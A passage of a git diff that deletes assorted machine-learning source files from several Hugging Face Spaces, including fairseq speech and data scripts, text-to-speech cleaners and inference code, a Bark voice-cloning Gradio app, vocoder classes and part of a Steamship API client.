csv.DictReader( - f, - delimiter="\t", - quotechar=None, - doublequote=False, - lineterminator="\n", - quoting=csv.QUOTE_NONE, - ) - subpaths = [op.join(root, e["audio"]) for e in reader] - start, end = get_shard_range(len(subpaths), nshard, rank) - subpaths = subpaths[start:end] - def iterate(): - for subpath in subpaths: - yield op.join(root, subpath), None - return iterate, len(subpaths) - - -def main( - root, tsv_path, ckpt_path, layer, nshard, rank, feat_dir, split, max_chunk -): - reader = HubertFeatureReaderS2T(ckpt_path, layer, max_chunk) - generator, num = get_path_iterator(root, tsv_path, nshard, rank) - dump_feature(reader, generator, num, split, nshard, rank, feat_dir) - - - -if __name__ == "__main__": - import argparse - - parser = argparse.ArgumentParser() - parser.add_argument("root") - parser.add_argument("tsv_path") - parser.add_argument("ckpt_path") - parser.add_argument("layer", type=int) - parser.add_argument("nshard", type=int) - parser.add_argument("rank", type=int) - parser.add_argument("feat_dir") - parser.add_argument("split") - parser.add_argument("--max_chunk", type=int, default=1600000) - args = parser.parse_args() - logger.info(args) - - main(**vars(args)) diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/multilingual/data_scripts/check_valid_test_overlaps.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/multilingual/data_scripts/check_valid_test_overlaps.py deleted file mode 100644 index 40fa9aecdf9108e095feb3661236453c0f7ed7c4..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/multilingual/data_scripts/check_valid_test_overlaps.py +++ /dev/null @@ -1,124 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - - -import os -import argparse -import pandas as pd -import sys - - -WORKDIR_ROOT = os.environ.get('WORKDIR_ROOT', None) - -if WORKDIR_ROOT is None or not WORKDIR_ROOT.strip(): - print('please specify your working directory root in OS environment variable WORKDIR_ROOT. Exitting..."') - sys.exit(-1) - -def load_langs(path): - with open(path) as fr: - langs = [l.strip() for l in fr] - return langs - - - -def load_sentences(raw_data, split, direction): - src, tgt = direction.split('-') - src_path = f"{raw_data}/{split}.{direction}.{src}" - tgt_path = f"{raw_data}/{split}.{direction}.{tgt}" - if os.path.exists(src_path) and os.path.exists(tgt_path): - return [(src, open(src_path).read().splitlines()), (tgt, open(tgt_path).read().splitlines())] - else: - return [] - -def swap_direction(d): - src, tgt = d.split('-') - return f'{tgt}-{src}' - -def get_all_test_data(raw_data, directions, split='test'): - test_data = [ - x - for dd in directions - for d in [dd, swap_direction(dd)] - for x in load_sentences(raw_data, split, d) - ] - # all_test_data = {s for _, d in test_data for s in d} - all_test_data = {} - for lang, d in test_data: - for s in d: - s = s.strip() - lgs = all_test_data.get(s, set()) - lgs.add(lang) - all_test_data[s] = lgs - return all_test_data, test_data - - -def check_train_sentences(src_path, tgt_path, direction, all_test_data, mess_up_train={}): - # src, tgt = direction.split('-') - print(f'check training data for {direction} in {src_path} and {tgt_path}') - size = 0 - overlapped_size_counted_dup = 0 - if not os.path.exists(tgt_path) or not os.path.exists(src_path): - return mess_up_train, size, overlapped_size_counted_dup - - with open(src_path) as f, open(tgt_path) as g: - for src_line, tgt_line in zip(f, g): - s = src_line.strip() - t = tgt_line.strip() - size += 1 - if s in all_test_data: - langs = mess_up_train.get(s, set()) - langs.add(direction) - mess_up_train[s] = langs - overlapped_size_counted_dup += 1 - if t in all_test_data: - langs = mess_up_train.get(t, set()) - langs.add(direction) - mess_up_train[t] = langs - overlapped_size_counted_dup += 1 - print(f'{direction}: size={size}, overlapped={overlapped_size_counted_dup}') - return mess_up_train, size, overlapped_size_counted_dup - -def check_train_all(raw_data, directions, all_test_data): - mess_up_train = {} - data_sizes = {} - # raw_data = '~chau/data-bin/MineBART/multilingual_mined_100M/en_XX/et_EE-en_XX/all.{en_XX, et_EE}' - print(f'checking training data againsts # {len(all_test_data)} sentences') - print(f'example test data: ', [s for i, s in enumerate(all_test_data.keys()) if i < 10]) - for direction in directions: - src, tgt = direction.split('-') - path = f'{raw_data}/en_XX/{direction}/all' - src_path = f'{path}.{src}' - tgt_path = f'{path}.{tgt}' - print(f'checking {src_path} {tgt_path}') - _, size, overlapped_size_counted_dup = check_train_sentences(src_path, tgt_path, direction, all_test_data, mess_up_train) - data_sizes[direction] = (size, overlapped_size_counted_dup) - return mess_up_train, data_sizes - - - - -def main(): - parser = argparse.ArgumentParser() - parser.add_argument("--folder", type=str, required=True, - help="the data folder ") - parser.add_argument("--test-data", type=str, required=True, - help="the test data folder ") - parser.add_argument('--directions', type=str, default=None, required=False) - - args = parser.parse_args() - directions = args.directions.split(',') - directions = sorted(set(directions)) - - results = [] - # print(f'checking where {args.split} split data are in training') - # print(f'direction\tcommon_count\tsrc common\ttgt common\tfrom_size\tto_size') - raw_data = args.folder - all_test_data, test_data = get_all_test_data(args.test_data, directions, split='test') - mess_up_train, data_sizes = check_train_all(raw_data, directions, all_test_data) - print(data_sizes) - - -if __name__ == "__main__": - main() diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/speech_recognition/data/data_utils.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/speech_recognition/data/data_utils.py deleted file mode 100644 index cc4729e63c8ef551b29617d1169a44c24f509ad0..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/speech_recognition/data/data_utils.py +++ /dev/null @@ -1,100 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import torch - - -def calc_mean_invstddev(feature): - if len(feature.size()) != 2: - raise ValueError("We expect the input feature to be 2-D tensor") - mean = feature.mean(0) - var = feature.var(0) - # avoid division by ~zero - eps = 1e-8 - if (var < eps).any(): - return mean, 1.0 / (torch.sqrt(var) + eps) - return mean, 1.0 / torch.sqrt(var) - - -def apply_mv_norm(features): - # If there is less than 2 spectrograms, the variance cannot be computed (is NaN) - # and normalization is not possible, so return the item as it is - if features.size(0) < 2: - return features - mean, invstddev = calc_mean_invstddev(features) - res = (features - mean) * invstddev - return res - - -def lengths_to_encoder_padding_mask(lengths, batch_first=False): - """ - convert lengths (a 1-D Long/Int tensor) to 2-D binary tensor - - Args: - lengths: a (B, )-shaped tensor - - Return: - max_length: maximum length of B sequences - encoder_padding_mask: a (max_length, B) binary mask, where - [t, b] = 0 for t < lengths[b] and 1 otherwise - - TODO: - kernelize this function if benchmarking shows this function is slow - """ - max_lengths = torch.max(lengths).item() - bsz = lengths.size(0) - encoder_padding_mask = torch.arange( - max_lengths - ).to( # a (T, ) tensor with [0, ..., T-1] - lengths.device - ).view( # move to the right device - 1, max_lengths - ).expand( # reshape to (1, T)-shaped tensor - bsz, -1 - ) >= lengths.view( # expand to (B, T)-shaped tensor - bsz, 1 - ).expand( - -1, max_lengths - ) - if not batch_first: - return encoder_padding_mask.t(), max_lengths - else: - return encoder_padding_mask, max_lengths - - -def encoder_padding_mask_to_lengths( - encoder_padding_mask, max_lengths, batch_size, device -): - """ - convert encoder_padding_mask (2-D binary tensor) to a 1-D tensor - - Conventionally, encoder output contains a encoder_padding_mask, which is - a 2-D mask in a shape (T, B), whose (t, b) element indicate whether - encoder_out[t, b] is a valid output (=0) or not (=1). Occasionally, we - need to convert this mask tensor to a 1-D tensor in shape (B, ), where - [b] denotes the valid length of b-th sequence - - Args: - encoder_padding_mask: a (T, B)-shaped binary tensor or None; if None, - indicating all are valid - Return: - seq_lengths: a (B,)-shaped tensor, where its (b, )-th element is the - number of valid elements of b-th sequence - - max_lengths: maximum length of all sequence, if encoder_padding_mask is - not None, max_lengths must equal to encoder_padding_mask.size(0) - - batch_size: batch size; if encoder_padding_mask is - not None, max_lengths must equal to encoder_padding_mask.size(1) - - device: which device to put the result on - """ - if encoder_padding_mask is None: - return torch.Tensor([max_lengths] * batch_size).to(torch.int32).to(device) - - assert encoder_padding_mask.size(0) == max_lengths, "max_lengths does not match" - assert encoder_padding_mask.size(1) == batch_size, "batch_size does not match" - - return max_lengths - torch.sum(encoder_padding_mask, dim=0) diff --git a/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/src/glow_tts/text/cleaners.py b/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/src/glow_tts/text/cleaners.py deleted file mode 100644 index 996d6299f6e520600671a08e5897117200bd17ca..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Hindi_TTS/vakyansh_tts/src/glow_tts/text/cleaners.py +++ /dev/null @@ -1,99 +0,0 @@ -""" from https://github.com/keithito/tacotron """ - -""" -Cleaners are transformations that run over the input text at both training and eval time. - -Cleaners can be selected by passing a comma-delimited list of cleaner names as the "cleaners" -hyperparameter. Some cleaners are English-specific. You'll typically want to use: - 1. "english_cleaners" for English text - 2. "transliteration_cleaners" for non-English text that can be transliterated to ASCII using - the Unidecode library (https://pypi.python.org/pypi/Unidecode) - 3. "basic_cleaners" if you do not want to transliterate (in this case, you should also update - the symbols in symbols.py to match your data). -""" - -import re -from unidecode import unidecode -from .numbers import normalize_numbers - - -# Regular expression matching whitespace: -_whitespace_re = re.compile(r"\s+") - -# List of (regular expression, replacement) pairs for abbreviations: -_abbreviations = [ - (re.compile("\\b%s\\." % x[0], re.IGNORECASE), x[1]) - for x in [ - ("mrs", "misess"), - ("mr", "mister"), - ("dr", "doctor"), - ("st", "saint"), - ("co", "company"), - ("jr", "junior"), - ("maj", "major"), - ("gen", "general"), - ("drs", "doctors"), - ("rev", "reverend"), - ("lt", "lieutenant"), - ("hon", "honorable"), - ("sgt", "sergeant"), - ("capt", "captain"), - ("esq", "esquire"), - ("ltd", "limited"), - ("col", "colonel"), - ("ft", "fort"), - ] -] - - -def expand_abbreviations(text): - for regex, replacement in _abbreviations: - text = re.sub(regex, replacement, text) - return text - - -def expand_numbers(text): - return normalize_numbers(text) - - -def lowercase(text): - return text.lower() - - -def collapse_whitespace(text): - return re.sub(_whitespace_re, " ", text) - - -def convert_to_ascii(text): - return unidecode(text) - - -def basic_cleaners(text): - """Basic pipeline that lowercases and collapses whitespace without transliteration.""" - text = lowercase(text) - text = collapse_whitespace(text) - return text - - -def transliteration_cleaners(text): - """Pipeline for non-English text that transliterates to ASCII.""" - text = convert_to_ascii(text) - text = lowercase(text) - text = collapse_whitespace(text) - return text - - -def english_cleaners(text): - """Pipeline for English text, including number and abbreviation expansion.""" - text = convert_to_ascii(text) - text = lowercase(text) - text = expand_numbers(text) - text = expand_abbreviations(text) - text = collapse_whitespace(text) - return text - - -def basic_indic_cleaners(text): - """Basic pipeline that collapses whitespace without transliteration.""" - text = collapse_whitespace(text) - return text diff --git a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/tts_infer/tts.py b/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/tts_infer/tts.py deleted file mode 100644 index b373de8d62ce4aeb6ba5db5a07e8b018c347217b..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/tts_infer/tts.py +++ /dev/null @@ -1,158 +0,0 @@ -from __future__ import absolute_import, division, print_function, unicode_literals -from typing import Tuple -import sys -from argparse import ArgumentParser - -import torch -import numpy as np -import os -import json -import torch - -sys.path.append(os.path.join(os.path.dirname(__file__), "../src/glow_tts")) - -from scipy.io.wavfile import write -from hifi.env import AttrDict -from hifi.models import Generator - - -from text import text_to_sequence -import commons -import models -import utils - - -def check_directory(dir): - if not os.path.exists(dir): - sys.exit("Error: {} directory does not exist".format(dir)) - - -class TextToMel: - def __init__(self, glow_model_dir, device="cuda"): - self.glow_model_dir = glow_model_dir - check_directory(self.glow_model_dir) - self.device = device - self.hps, self.glow_tts_model = self.load_glow_tts() - pass - - def load_glow_tts(self): - hps = utils.get_hparams_from_dir(self.glow_model_dir) - checkpoint_path = utils.latest_checkpoint_path(self.glow_model_dir) - symbols = list(hps.data.punc) + list(hps.data.chars) - glow_tts_model = models.FlowGenerator( - len(symbols) + getattr(hps.data, "add_blank", False), - out_channels=hps.data.n_mel_channels, - **hps.model - ) # .to(self.device) - - if self.device == "cuda": - glow_tts_model.to("cuda") - - utils.load_checkpoint(checkpoint_path, glow_tts_model) - glow_tts_model.decoder.store_inverse() - _ = glow_tts_model.eval() - - return hps, glow_tts_model - - def generate_mel(self, text, noise_scale=0.667, length_scale=1.0): - symbols = list(self.hps.data.punc) + list(self.hps.data.chars) - cleaner = self.hps.data.text_cleaners - if getattr(self.hps.data, "add_blank", False): - text_norm = text_to_sequence(text, symbols, cleaner) - text_norm = commons.intersperse(text_norm, len(symbols)) - else: # If not using "add_blank" option during training, adding spaces at the beginning and the end of utterance improves quality - text = " " + text.strip() + " " - text_norm = text_to_sequence(text, symbols, cleaner) - - sequence = np.array(text_norm)[None, :] - - del symbols - del cleaner - del text - del text_norm - - if self.device == "cuda": - x_tst = torch.autograd.Variable(torch.from_numpy(sequence)).cuda().long() - x_tst_lengths = torch.tensor([x_tst.shape[1]]).cuda() - else: - x_tst = torch.autograd.Variable(torch.from_numpy(sequence)).long() - x_tst_lengths = torch.tensor([x_tst.shape[1]]) - - with torch.no_grad(): - (y_gen_tst, *_), *_, (attn_gen, *_) = self.glow_tts_model( - x_tst, - x_tst_lengths, - gen=True, - noise_scale=noise_scale, - length_scale=length_scale, - ) - del x_tst - del x_tst_lengths - torch.cuda.empty_cache() - return y_gen_tst - #return y_gen_tst.cpu().detach().numpy() - - -class MelToWav: - def __init__(self, hifi_model_dir, device="cuda"): - self.hifi_model_dir = hifi_model_dir - check_directory(self.hifi_model_dir) - self.device = device - self.h, self.hifi_gan_generator = self.load_hifi_gan() - pass - - def load_hifi_gan(self): - checkpoint_path = utils.latest_checkpoint_path(self.hifi_model_dir, regex="g_*") - config_file = os.path.join(self.hifi_model_dir, "config.json") - data = open(config_file).read() - json_config = json.loads(data) - h = AttrDict(json_config) - torch.manual_seed(h.seed) - - generator = Generator(h).to(self.device) - - assert os.path.isfile(checkpoint_path) - print("Loading '{}'".format(checkpoint_path)) - state_dict_g = torch.load(checkpoint_path, map_location=self.device) - print("Complete.") - - generator.load_state_dict(state_dict_g["generator"]) - - generator.eval() - generator.remove_weight_norm() - - return h, generator - - def generate_wav(self, mel): - #mel = torch.FloatTensor(mel).to(self.device) - - y_g_hat = self.hifi_gan_generator(mel.to(self.device)) # passing through vocoder - audio = y_g_hat.squeeze() - audio = audio * 32768.0 - audio = audio.cpu().detach().numpy().astype("int16") - - del y_g_hat - del mel - torch.cuda.empty_cache() - return audio, self.h.sampling_rate - - -if __name__ == "__main__": - - parser = ArgumentParser() - parser.add_argument("-m", "--model", required=True, type=str) - parser.add_argument("-g", "--gan", required=True, type=str) - parser.add_argument("-d", "--device", type=str, default="cpu") - parser.add_argument("-t", "--text", type=str, required=True) - parser.add_argument("-w", "--wav", type=str, required=True) - args = parser.parse_args() - - text_to_mel = TextToMel(glow_model_dir=args.model, device=args.device) - mel_to_wav = MelToWav(hifi_model_dir=args.gan, device=args.device) - - mel = text_to_mel.generate_mel(args.text) - audio, sr = mel_to_wav.generate_wav(mel) - - write(filename=args.wav, rate=sr, data=audio) - - pass diff --git a/spaces/HenryJJ/llm_template/README.md b/spaces/HenryJJ/llm_template/README.md deleted file mode 100644 index 9aeab4e954ab57e7a93d1d86846f275230329c05..0000000000000000000000000000000000000000 --- a/spaces/HenryJJ/llm_template/README.md +++ /dev/null @@ -1,17 +0,0 @@ ---- -title: Llm Template -emoji: 🌖 -colorFrom: yellow -colorTo: indigo -sdk: gradio -sdk_version: 3.41.2 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -``` -export no_proxy="localhost, 127.0.0.1" -``` - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Hobis/bark-voice-cloning-polish-HuBERT-quantizer/app.py b/spaces/Hobis/bark-voice-cloning-polish-HuBERT-quantizer/app.py deleted file mode 100644 index 767ab11aa71974844e5f6a317e11948c30a7c2bf..0000000000000000000000000000000000000000 --- a/spaces/Hobis/bark-voice-cloning-polish-HuBERT-quantizer/app.py +++ /dev/null @@ -1,49 +0,0 @@ - -import os -import torchaudio -import torch -import numpy as np -import gradio as gr - -from hubert.hubert_manager import HuBERTManager -from hubert.pre_kmeans_hubert import CustomHubert -from hubert.customtokenizer import CustomTokenizer -from encodec import EncodecModel -from encodec.utils import convert_audio - -hubert_model = CustomHubert(checkpoint_path='hubert.pt') -model = EncodecModel.encodec_model_24khz() -model.set_target_bandwidth(6.0) -tokenizer = CustomTokenizer.load_from_checkpoint('polish-HuBERT-quantizer_8_epoch.pth', map_location=torch.device('cpu')) - - -def process_audio(in_file): - input_filename = in_file.name - - wav, sr = torchaudio.load(input_filename) - if wav.shape[0] == 2: - wav = wav.mean(0, keepdim=True) - semantic_vectors = hubert_model.forward(wav, input_sample_hz=sr) - semantic_tokens = tokenizer.get_token(semantic_vectors) - wav = convert_audio(wav, sr, model.sample_rate, model.channels) - wav = wav.unsqueeze(0) - with torch.no_grad(): - encoded_frames = model.encode(wav) - codes = torch.cat([encoded[0] for encoded in encoded_frames], dim=-1).squeeze() - fine_prompt = codes - coarse_prompt = fine_prompt[:2, :] - - output_filename = os.path.splitext(input_filename)[0] + '.npz' - - np.savez(output_filename, semantic_prompt=semantic_tokens, fine_prompt=fine_prompt, coarse_prompt=coarse_prompt) - return output_filename - -iface = gr.Interface(fn=process_audio, inputs=gr.inputs.File(label="Input Audio"), outputs=gr.outputs.File(label="Output File")) -iface.launch() - - - - - - - diff --git a/spaces/ICML2022/OFA/fairseq/fairseq/models/text_to_speech/vocoder.py b/spaces/ICML2022/OFA/fairseq/fairseq/models/text_to_speech/vocoder.py deleted file mode 100644 index 65d9f9f06bfe7ffa3ed332bb41c4cdd65ac2b916..0000000000000000000000000000000000000000 --- a/spaces/ICML2022/OFA/fairseq/fairseq/models/text_to_speech/vocoder.py +++ /dev/null @@ -1,197 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import logging -import json -from typing import Dict - -import numpy as np -import torch -from torch import nn -import torch.nn.functional as F - -from fairseq.data.audio.audio_utils import ( - get_window, get_fourier_basis, get_mel_filters, TTSSpectrogram -) -from fairseq.data.audio.speech_to_text_dataset import S2TDataConfig -from fairseq.models.text_to_speech.hifigan import Generator as HiFiGANModel - -logger = logging.getLogger(__name__) - - -class PseudoInverseMelScale(torch.nn.Module): - def __init__(self, n_stft, n_mels, sample_rate, f_min, f_max) -> None: - super(PseudoInverseMelScale, self).__init__() - self.n_mels = n_mels - basis = get_mel_filters( - sample_rate, (n_stft - 1) * 2, n_mels, f_min, f_max - ) - basis = torch.pinverse(basis) # F x F_mel - self.register_buffer('basis', basis) - - def forward(self, melspec: torch.Tensor) -> torch.Tensor: - # pack batch - shape = melspec.shape # B_1 x ... x B_K x F_mel x T - n_mels, time = shape[-2], shape[-1] - melspec = melspec.view(-1, n_mels, time) - - freq, _ = self.basis.size() # F x F_mel - assert self.n_mels == n_mels, (self.n_mels, n_mels) - specgram = self.basis.matmul(melspec).clamp(min=0) - - # unpack batch - specgram = specgram.view(shape[:-2] + (freq, time)) - return specgram - - -class GriffinLim(torch.nn.Module): - def __init__( - self, n_fft: int, win_length: int, hop_length: int, n_iter: int, - window_fn=torch.hann_window - ): - super(GriffinLim, self).__init__() - self.transform = TTSSpectrogram( - n_fft, win_length, hop_length, return_phase=True - ) - - basis = get_fourier_basis(n_fft) - basis = torch.pinverse(n_fft / hop_length * basis).T[:, None, :] - basis *= get_window(window_fn, n_fft, win_length) - self.register_buffer('basis', basis) - - self.n_fft = n_fft - self.win_length = win_length - self.hop_length = hop_length - self.n_iter = n_iter - - self.tiny = 1.1754944e-38 - - @classmethod - def get_window_sum_square( - cls, n_frames, hop_length, win_length, n_fft, - window_fn=torch.hann_window - ) -> torch.Tensor: - w_sq = get_window(window_fn, n_fft, win_length) ** 2 - n = n_fft + hop_length * (n_frames - 1) - x = torch.zeros(n, dtype=torch.float32) - for i in range(n_frames): - ofst = i * hop_length - x[ofst: min(n, ofst + n_fft)] += w_sq[:max(0, min(n_fft, n - ofst))] - return x - - def inverse(self, magnitude: torch.Tensor, phase) -> torch.Tensor: - x = torch.cat( - [magnitude * torch.cos(phase), magnitude * torch.sin(phase)], - dim=1 - ) - x = F.conv_transpose1d(x, self.basis, stride=self.hop_length) - win_sum_sq = self.get_window_sum_square( - magnitude.shape[-1], hop_length=self.hop_length, - win_length=self.win_length, n_fft=self.n_fft - ).to(magnitude.device) - # remove modulation effects - approx_nonzero_indices = win_sum_sq > self.tiny - x[:, :, approx_nonzero_indices] /= win_sum_sq[approx_nonzero_indices] - x *= self.n_fft / self.hop_length - x = x[:, :, self.n_fft // 2:] - x = x[:, :, :-self.n_fft // 2:] - return x - - def forward(self, specgram: torch.Tensor) -> torch.Tensor: - angles = np.angle(np.exp(2j * np.pi * np.random.rand(*specgram.shape))) - angles = torch.from_numpy(angles).to(specgram) - _specgram = specgram.view(-1, specgram.shape[-2], specgram.shape[-1]) - waveform = self.inverse(_specgram, angles).squeeze(1) - for _ in range(self.n_iter): - _, angles = self.transform(waveform) - waveform = self.inverse(_specgram, angles).squeeze(1) - return waveform.squeeze(0) - - -class GriffinLimVocoder(nn.Module): - def __init__(self, sample_rate, win_size, hop_size, n_fft, - n_mels, f_min, f_max, window_fn, - spec_bwd_max_iter=32, - fp16=False): - super().__init__() - self.inv_mel_transform = PseudoInverseMelScale( - n_stft=n_fft // 2 + 1, n_mels=n_mels, sample_rate=sample_rate, - f_min=f_min, f_max=f_max - ) - self.gl_transform = GriffinLim( - n_fft=n_fft, win_length=win_size, hop_length=hop_size, - window_fn=window_fn, n_iter=spec_bwd_max_iter - ) - if fp16: - self.half() - self.inv_mel_transform.half() - self.gl_transform.half() - else: - self.float() - self.inv_mel_transform.float() - self.gl_transform.float() - - def forward(self, x): - # x: (B x) T x D -> (B x) 1 x T - # NOTE: batched forward produces noisier waveform. recommend running - # one utterance at a time - self.eval() - x = x.exp().transpose(-1, -2) - x = self.inv_mel_transform(x) - x = self.gl_transform(x) - return x - - @classmethod - def from_data_cfg(cls, args, data_cfg: S2TDataConfig): - feat_cfg = data_cfg.config["features"] - window_fn = getattr(torch, feat_cfg["window_fn"] + "_window") - return cls( - sample_rate=feat_cfg["sample_rate"], - win_size=int(feat_cfg["win_len_t"] * feat_cfg["sample_rate"]), - hop_size=int(feat_cfg["hop_len_t"] * feat_cfg["sample_rate"]), - n_fft=feat_cfg["n_fft"], n_mels=feat_cfg["n_mels"], - f_min=feat_cfg["f_min"], f_max=feat_cfg["f_max"], - window_fn=window_fn, spec_bwd_max_iter=args.spec_bwd_max_iter, - fp16=args.fp16 - ) - - -class HiFiGANVocoder(nn.Module): - def __init__( - self, checkpoint_path: str, model_cfg: Dict[str, str], - fp16: bool = False - ) -> None: - super().__init__() - self.model = HiFiGANModel(model_cfg) - state_dict = torch.load(checkpoint_path) - self.model.load_state_dict(state_dict["generator"]) - if fp16: - self.model.half() - logger.info(f"loaded HiFiGAN checkpoint from {checkpoint_path}") - - def forward(self, x: torch.Tensor) -> torch.Tensor: - # (B x) T x D -> (B x) 1 x T - model = self.model.eval() - if len(x.shape) == 2: - return model(x.unsqueeze(0).transpose(1, 2)).detach().squeeze(0) - else: - return model(x.transpose(-1, -2)).detach() - - @classmethod - def from_data_cfg(cls, args, data_cfg: S2TDataConfig): - vocoder_cfg = data_cfg.vocoder - assert vocoder_cfg.get("type", "griffin_lim") == "hifigan" - with open(vocoder_cfg["config"]) as f: - model_cfg = json.load(f) - return cls(vocoder_cfg["checkpoint"], model_cfg, fp16=args.fp16) - - -def get_vocoder(args, data_cfg: S2TDataConfig): - if args.vocoder == "griffin_lim": - return GriffinLimVocoder.from_data_cfg(args, data_cfg) - elif args.vocoder == "hifigan": - return HiFiGANVocoder.from_data_cfg(args, data_cfg) - else: - raise ValueError("Unknown vocoder") diff --git a/spaces/Jackflack09/diffuse-custom/Waifu2x/__init__.py b/spaces/Jackflack09/diffuse-custom/Waifu2x/__init__.py deleted file mode 100644 index 919c67429f059707b271b067f40783c04a42a5ac..0000000000000000000000000000000000000000 --- a/spaces/Jackflack09/diffuse-custom/Waifu2x/__init__.py +++ /dev/null @@ -1,9 +0,0 @@ -# -*- coding: utf-8 -*- -# file: __init__.py -# time: 05/12/2022 -# author: yangheng -# github: https://github.com/yangheng95 -# huggingface: https://huggingface.co/yangheng -# google scholar: https://scholar.google.com/citations?user=NPq5a_0AAAAJ&hl=en -# Copyright (C) 2021. All Rights Reserved. -from .magnify import ImageMagnifier diff --git a/spaces/Jamkonams/AutoGPT/autogpt/config/singleton.py b/spaces/Jamkonams/AutoGPT/autogpt/config/singleton.py deleted file mode 100644 index 55b2aeea120bbe51ca837265fcb7fbff467e55f2..0000000000000000000000000000000000000000 --- a/spaces/Jamkonams/AutoGPT/autogpt/config/singleton.py +++ /dev/null @@ -1,24 +0,0 @@ -"""The singleton metaclass for ensuring only one instance of a class.""" -import abc - - -class Singleton(abc.ABCMeta, type): - """ - Singleton metaclass for ensuring only one instance of a class. - """ - - _instances = {} - - def __call__(cls, *args, **kwargs): - """Call method for the singleton metaclass.""" - if cls not in cls._instances: - cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs) - return cls._instances[cls] - - -class AbstractSingleton(abc.ABC, metaclass=Singleton): - """ - Abstract singleton class for ensuring only one instance of a class. - """ - - pass diff --git a/spaces/JeffJing/ZookChatBot/steamship/client/steamship.py b/spaces/JeffJing/ZookChatBot/steamship/client/steamship.py deleted file mode 100644 index c15c918842eef56cf72793a7df7157cfb2d86d7d..0000000000000000000000000000000000000000 --- a/spaces/JeffJing/ZookChatBot/steamship/client/steamship.py +++ /dev/null @@ -1,327 +0,0 @@ -from __future__ import annotations - -import logging -import uuid -from contextlib import contextmanager -from typing import Any, Dict, Generator, List, Optional - -from pydantic import BaseModel - -from steamship.base.client import Client -from steamship.base.configuration import Configuration -from steamship.base.error import SteamshipError -from steamship.client.skill_to_provider import SKILL_TO_PROVIDER -from steamship.client.skills import Skill -from steamship.client.vendors import Vendor -from steamship.data.embeddings import EmbedAndSearchRequest, QueryResults -from steamship.data.package.package_instance import PackageInstance -from steamship.data.plugin.index_plugin_instance import EmbeddingIndexPluginInstance -from steamship.data.plugin.plugin_instance import PluginInstance -from steamship.data.plugin.prompt_generation_plugin_instance import PromptGenerationPluginInstance -from steamship.data.workspace import Workspace -from steamship.utils.metadata import hash_dict - -_logger = logging.getLogger(__name__) - - -class Steamship(Client): - """Steamship Python Client.""" - - # Some plugin instances use special subclasses which provide helper methods and/or more complex - # behavior than typical PluginInstance subclass permits. Examples are: - # - # - Embedding indices (which much coordinate both embedding taggers & vector indices) - # - Prompt generators (which benefit from supporting, prompt-specific, methods) - _PLUGIN_INSTANCE_SUBCLASS_OVERRIDES = { - "prompt-generation-default": PromptGenerationPluginInstance, - "prompt-generation-trainable-default": PromptGenerationPluginInstance, - "gpt3": PromptGenerationPluginInstance, - "gpt-3": PromptGenerationPluginInstance, - "cerebrium": PromptGenerationPluginInstance, - "embedding-index": EmbeddingIndexPluginInstance, - } - - def __init__( - self, - api_key: str = None, - api_base: str = None, - app_base: str = None, - web_base: str = None, - workspace: str = None, - fail_if_workspace_exists: bool = False, - profile: str = None, - config_file: str = None, - config: Configuration = None, - trust_workspace_config: bool = False, # For use by lambda_handler; don't fetch the workspace - **kwargs, - ): - super().__init__( - api_key=api_key, - api_base=api_base, - app_base=app_base, - web_base=web_base, - workspace=workspace, - fail_if_workspace_exists=fail_if_workspace_exists, - profile=profile, - config_file=config_file, - config=config, - trust_workspace_config=trust_workspace_config, - **kwargs, - ) - # We use object.__setattr__ here in order to bypass Pydantic's overloading of it (which would block this - # set unless we were to add this as a field) - object.__setattr__(self, "use", self._instance_use) - object.__setattr__(self, "use_plugin", self._instance_use_plugin) - - def __repr_args__(self: BaseModel) -> Any: - """Because of the trick we've done with `use` and `use_plugin`, we need to exclude these from __repr__ - otherwise we'll get an infinite recursion.""" - return [ - (key, value) - for key, value in self.__dict__.items() - if key != "use" and key != "use_plugin" - ] - - def embed_and_search( - self, - query: str, - docs: List[str], - plugin_instance: str, - k: int = 1, - ) -> QueryResults: - req = EmbedAndSearchRequest(query=query, docs=docs, plugin_instance=plugin_instance, k=k) - return self.post( - "plugin/instance/embeddingSearch", - req, - expect=QueryResults, - ) - - @staticmethod - @contextmanager - def temporary_workspace(**kwargs) -> Generator["Steamship", None, None]: - """Create a client rooted in a temporary workspace that will be deleted after use.""" - # Create a new client and switch to a temporary workspace - client = Steamship(**kwargs) - temporary_handle = "temp-" + str(uuid.uuid4()) - client.switch_workspace(temporary_handle) - - # Safety check that we are now working form the new workspace. - if client.config.workspace_handle != temporary_handle: - raise SteamshipError( - message=f"Attempted to switch to temporary workspace {temporary_handle} but the client claimed to be working from {client.config.workspace_handle}" - ) - - yield client - - # Safely delete the temporary workspace. Here we re-fetch the workspace using the temporary_handle - # in case the user switched workspaces yet again upon the client. - workspace = Workspace.get(client, handle=temporary_handle) - if workspace.handle != temporary_handle: - raise SteamshipError( - message=f"Was about to delete temporary workspace {temporary_handle} but its handle is different: {workspace.handle}" - ) - else: - workspace.delete() - - @staticmethod - def use( - package_handle: str, - instance_handle: Optional[str] = None, - config: Optional[Dict[str, Any]] = None, - version: Optional[str] = None, - fetch_if_exists: bool = True, - workspace_handle: Optional[str] = None, - **kwargs, - ) -> PackageInstance: - """Creates/loads an instance of package `package_handle`. - - The instance is named `instance_handle` and located in the Workspace named `instance_handle`. If no - `instance_handle` is provided, the default is `package_handle`. - - For example, one may 